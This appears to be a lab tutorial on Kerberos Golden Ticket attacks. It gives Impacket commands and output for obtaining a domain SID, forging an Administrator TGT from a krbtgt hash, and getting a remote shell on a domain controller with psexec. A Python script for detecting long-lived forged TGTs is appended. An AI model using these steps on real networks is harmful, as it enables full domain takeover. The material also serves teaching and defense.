Golden Ticket
What is a Golden Ticket?
A Golden Ticket is a type of forged Kerberos Ticket Granting Ticket (TGT) that allows an attacker to gain full, unrestricted access to all services and systems within a Kerberos realm. This attack exploits the fact that all TGTs are encrypted with the krbtgt account's secret key, which is stored within the Key Distribution Center (KDC).
By compromising the krbtgt account, an attacker can create valid TGTs for any user, giving them the ability to impersonate any user in the domain, including domain administrators.
How Golden Tickets Work
Golden Tickets work by exploiting the Kerberos trust model. Here's how the process typically unfolds:
- Compromise the Domain: The attacker obtains the krbtgt account hash by gaining administrative privileges on a domain controller or through lateral movement.
- Generate a Forged TGT: Using the krbtgt account's hash, the attacker creates a forged TGT, giving them access to any service or user in the domain.
- Maintain Persistence: The attacker can maintain access indefinitely, as long as the krbtgt hash remains unchanged.
Crafting a Golden Ticket with Ticketer
Impacket's Ticketer is a powerful Python-based tool designed for crafting Kerberos tickets, including Golden Tickets, directly from the command line. To create a Golden Ticket, we need two key elements: the NTLM hash of the krbtgt account and the SID (Security Identifier) of the target domain.
1. Obtaining the Domain SID
The SID (Security Identifier) is a unique value used to identify objects like users, groups, and computers within a Windows domain. It is essential for crafting a valid Golden Ticket, as it ensures the ticket can be authenticated within the correct domain. To retrieve the SID, we can use Impacket's lookupsid.py tool by providing valid domain credentials:

lookupsid.py "red.lab"/'qu35t':'Password123'@"192.168.10.100" 0

[*] Brute forcing SIDs at 192.168.10.100
[*] StringBinding ncacn_np:192.168.10.100[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-3433736088-161430583-3583626515

2. Forging the Golden Ticket
Once the NTLM hash of the krbtgt account has been obtained and the domain SID is known, we can generate a Golden Ticket for a specific user (such as Administrator) with the following command:

ticketer.py -nthash e54f909c885bab9e50e8a914bb703211 -domain-sid S-1-5-21-3433736088-161430583-3583626515 -domain "red.lab" Administrator

Impacket v0.12.0.dev1+20240808.192004.154de8a5 - Copyright 2023 Fortra
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for red.lab/Administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncAsRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncASRepPart
[*] Saving ticket in Administrator.ccache

A ccache file (credential cache) stores Kerberos tickets for the user. It allows authentication to services without needing to re-enter credentials. In this case, the Administrator.ccache file contains the forged Golden Ticket, which can be used for subsequent Kerberos-authenticated requests.
3. Using the Golden Ticket
To use the Golden Ticket, export the KRB5CCNAME environment variable to point to the .ccache file created earlier:

export KRB5CCNAME=/workspace/Administrator.ccache

We can then list the active Kerberos tickets to verify that the Golden Ticket is loaded:

klist

Ticket cache: FILE:/workspace/Administrator.ccache
Default principal: Administrator@red.lab
Valid starting       Expires              Service principal
09/22/2024 15:39:25  09/20/2034 15:39:25  krbtgt/red.lab@red.lab
        renew until 09/20/2034 15:39:25

With the Golden Ticket loaded, we can now access domain resources with elevated privileges. For example, using Impacket's psexec.py tool, we can execute commands remotely on a domain controller (or any other machine) without needing additional credentials:

psexec.py -k -no-pass "Administrator"@"DC01"

Impacket v0.12.0.dev1+20240808.192004.154de8a5 - Copyright 2023 Fortra
[*] Requesting shares on DC01.....
[*] Found writable share ADMIN$
[*] Uploading file YmDWICzQ.exe
[*] Opening SVCManager on DC01.....
[*] Creating service gYWQ on DC01.....
[*] Starting service gYWQ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.587]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>
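The klist output above shows one of the defender-visible traits of a forged TGT: a ten-year validity window, far beyond what any domain policy issues. As an added example (not part of the original page or of Impacket), the following script parses klist-style ticket listings and flags krbtgt tickets whose lifetime or renewal window exceeds policy; the 10-hour TGT lifetime and 7-day renewal limit are the Windows domain defaults, and the sample listing is constructed from the output above.

```python
from datetime import datetime, timedelta

# Assumed policy limits: Windows domain defaults (Max lifetime for user ticket: 10 h,
# Max lifetime for user ticket renewal: 7 days). Adjust to the audited domain's GPO.
MAX_TGT_LIFETIME = timedelta(hours=10)
MAX_RENEW_LIFETIME = timedelta(days=7)
TS = "%m/%d/%Y %H:%M:%S"

# Constructed sample, modelled on the klist output shown in the article.
SAMPLE_KLIST = """Ticket cache: FILE:/workspace/Administrator.ccache
Default principal: Administrator@red.lab

Valid starting       Expires              Service principal
09/22/2024 15:39:25  09/20/2034 15:39:25  krbtgt/red.lab@red.lab
        renew until 09/20/2034 15:39:25
"""

def parse_klist(text):
    """Parse klist listing into dicts: start, expires, renew_until, service."""
    tickets = []
    for line in text.splitlines():
        s = line.strip()
        if s.startswith("renew until") and tickets:
            tickets[-1]["renew_until"] = datetime.strptime(s[len("renew until"):].strip(), TS)
            continue
        parts = s.split()
        # Ticket rows: <start date> <start time> <expiry date> <expiry time> <service>
        if len(parts) == 5 and parts[0].count("/") == 2 and parts[2].count("/") == 2:
            try:
                start = datetime.strptime(f"{parts[0]} {parts[1]}", TS)
                expires = datetime.strptime(f"{parts[2]} {parts[3]}", TS)
            except ValueError:
                continue  # not a ticket row after all
            tickets.append({"start": start, "expires": expires,
                            "renew_until": None, "service": parts[4]})
    return tickets

def suspicious_tgts(text, max_life=MAX_TGT_LIFETIME, max_renew=MAX_RENEW_LIFETIME):
    """Return (service, reasons) for krbtgt tickets that violate the policy limits."""
    findings = []
    for t in parse_klist(text):
        if not t["service"].startswith("krbtgt/"):
            continue  # only TGTs are issued under the krbtgt key
        reasons = []
        lifetime = t["expires"] - t["start"]
        if lifetime > max_life:
            reasons.append(f"lifetime {lifetime} exceeds policy {max_life}")
        if t["renew_until"] and t["renew_until"] - t["start"] > max_renew:
            reasons.append(f"renewal window exceeds policy {max_renew}")
        if reasons:
            findings.append((t["service"], reasons))
    return findings
```

Because ticketer.py lets the forger choose a lifetime, a policy-conformant lifetime does not clear a ticket; pair this check with KDC-side correlation (4769 service ticket requests with no matching 4768 TGT request) and periodic double rotation of the krbtgt password.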